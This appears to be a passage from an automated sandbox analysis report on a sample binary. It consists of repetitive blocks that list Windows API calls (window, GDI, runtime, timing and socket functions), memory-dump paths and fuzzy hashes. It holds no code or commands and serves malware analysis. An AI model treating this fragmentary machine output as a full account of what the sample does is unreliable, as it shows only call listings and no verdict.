                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(02D01B70,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(02D01B70,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 142311417-0
                                                                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                  • _wcslen.LIBCMT ref: 004458FB
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3087257052-0
                                                                                                                  • Opcode ID: b20aefa86df6a19b4968d9d95a68823911e5cfb0b4595b53789eba6096696d07
                                                                                                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                  • Opcode Fuzzy Hash: b20aefa86df6a19b4968d9d95a68823911e5cfb0b4595b53789eba6096696d07
                                                                                                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 245547762-0
                                                                                                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                  • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2338827641-0
                                                                                                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2875609808-0
                                                                                                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4023252218-0
                                                                                                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1489400265-0
                                                                                                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                  • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1042038666-0
                                                                                                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                  APIs
                                                                                                                  • __getptd.LIBCMT ref: 0041780F
                                                                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                  • __getptd.LIBCMT ref: 00417826
                                                                                                                  • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                  • __lock.LIBCMT ref: 00417844
                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 938513278-0
                                                                                                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2403457894-0
                                                                                                                  • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                  • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                  • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                  • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
